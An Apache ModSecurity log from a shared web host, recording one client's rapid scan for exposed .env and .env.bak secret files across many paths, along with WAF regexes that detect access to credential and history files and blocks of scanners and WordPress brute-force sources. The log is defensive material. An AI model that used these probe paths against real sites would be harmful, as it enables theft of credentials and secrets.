[Tue May 26 14:49:44.552524 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs0wAAANA"]
[Tue May 26 14:49:44.575978 2026] [security2:error] [pid 648203:tid 648359] [client 20.172.36.113:60792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 113.36.172.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "midrivermarina.com"] [uri "/ss.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs1QAAAJ8"]
[Tue May 26 14:49:44.621314 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs4gAAAPk"]
[Tue May 26 14:49:44.627123 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs4AAAAJc"]
[Tue May 26 14:49:44.628155 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs5AAAANI"]
[Tue May 26 14:49:44.628170 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs8QAAALw"]
[Tue May 26 14:49:44.632690 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs8wAAAN8"]
[Tue May 26 14:49:44.636513 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs4wAAAO4"]
[Tue May 26 14:49:44.636581 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs8gAAALc"]
[Tue May 26 14:49:44.637869 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs9AAAALg"]
[Tue May 26 14:49:44.650728 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs9wAAAOc"]
[Tue May 26 14:49:44.659129 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs9QAAAJk"]
[Tue May 26 14:49:44.750818 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs_QAAAP0"]
[Tue May 26 14:49:44.770794 2026] [security2:error] [pid 648203:tid 648263] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/s3/.env.bak"] [unique_id "ahVlsLEQDDtxJNiDrdTtCgAA3Ts"]
[Tue May 26 14:49:44.919999 2026] [security2:error] [pid 648203:tid 648257] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/.env"] [unique_id "ahVlsLEQDDtxJNiDrdTtMQAA3TU"]
[Tue May 26 14:49:44.931923 2026] [security2:error] [pid 648203:tid 648254] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/api/.env"] [unique_id "ahVlsLEQDDtxJNiDrdTtMgAA3TI"]
[Tue May 26 14:49:45.080222 2026] [security2:error] [pid 648203:tid 648259] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/backend/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtOAAA3Tc"]
[Tue May 26 14:49:45.281841 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtAQAAAPc"]
[Tue May 26 14:49:45.284000 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs_gAAAM8"]
[Tue May 26 14:49:45.288546 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtBAAAAJE"]
[Tue May 26 14:49:45.294998 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtCQAAAO8"]
[Tue May 26 14:49:45.304278 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtCAAAANE"]
[Tue May 26 14:49:45.334837 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtKQAAANg"]
[Tue May 26 14:49:45.335257 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtIwAA3Sg"]
[Tue May 26 14:49:45.337830 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtGwAAAOg"]
[Tue May 26 14:49:45.338563 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtHwAAAKE"]
[Tue May 26 14:49:45.341043 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtKAAAAIs"]
[Tue May 26 14:49:45.342715 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtJwAAAPM"]
[Tue May 26 14:49:45.343477 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtNgAA3SI"]
[Tue May 26 14:49:45.345147 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtJgAAAN4"]
[Tue May 26 14:49:45.347453 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtOgAA3RM"]
[Tue May 26 14:49:45.347647 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtHQAAAMk"]
[Tue May 26 14:49:45.351239 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtIgAAAPw"]
[Tue May 26 14:49:45.495259 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtQQAAj0M"]
[Tue May 26 14:49:45.505823 2026] [security2:error] [pid 648203:tid 648286] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/services/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtSwAAj1I"]
[Tue May 26 14:49:45.507298 2026] [security2:error] [pid 648203:tid 648280] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/service/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtTAAAj0w"]
[Tue May 26 14:49:45.548569 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtQwAAjxE"]
[Tue May 26 14:49:45.553295 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtQgAAjzY"]
[Tue May 26 14:49:45.557901 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtRAAAjxU"]
[Tue May 26 14:49:45.571543 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtTgAAAO0"]
[Tue May 26 14:49:45.577202 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtUwAAjyU"]
[Tue May 26 14:49:45.577383 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtWAAAALA"]
[Tue May 26 14:49:45.581558 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtRQAAj1M"]
[Tue May 26 14:49:45.582595 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXAAAAP0"]
[Tue May 26 14:49:45.583811 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXwAAAI4"]
[Tue May 26 14:49:45.584353 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXQAAAMM"]
[Tue May 26 14:49:45.588041 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXgAAAKQ"]
[Tue May 26 14:49:45.588565 2026] [security2:error] [pid 648203:tid 648393] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtWgAAAME"]
[Tue May 26 14:49:45.599370 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtYAAAAMY"]
[Tue May 26 14:49:45.653641 2026] [security2:error] [pid 648203:tid 648277] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shared/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtZgAAqUk"]
[Tue May 26 14:49:45.654471 2026] [security2:error] [pid 648203:tid 648269] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shop/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtZwAAqUE"]
[Tue May 26 14:49:45.725876 2026] [security2:error] [pid 648203:tid 648306] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/src/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtfQAAqWY"]
[Tue May 26 14:49:46.090445 2026] [security2:error] [pid 648203:tid 648451] [client 74.249.173.207:27840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtmAAAAPs"]
[Tue May 26 14:49:46.102598 2026] [security2:error] [pid 648203:tid 648256] [remote 154.66.198.148:30178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtlQAA6jQ"]
[Tue May 26 14:49:46.219736 2026] [security2:error] [pid 648203:tid 648368] [client 104.207.38.161:59481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtOQAAAKg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:46.315485 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtaQAAAJs"]
[Tue May 26 14:49:46.318918 2026] [security2:error] [pid 648203:tid 648432] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtjwAAAOg"]
[Tue May 26 14:49:46.337321 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthAAAAKA"]
[Tue May 26 14:49:46.344014 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtcQAAAMc"]
[Tue May 26 14:49:46.344092 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtgQAAqU8"]
[Tue May 26 14:49:46.346476 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtdwAAANE"]
[Tue May 26 14:49:46.349480 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtgAAAqUo"]
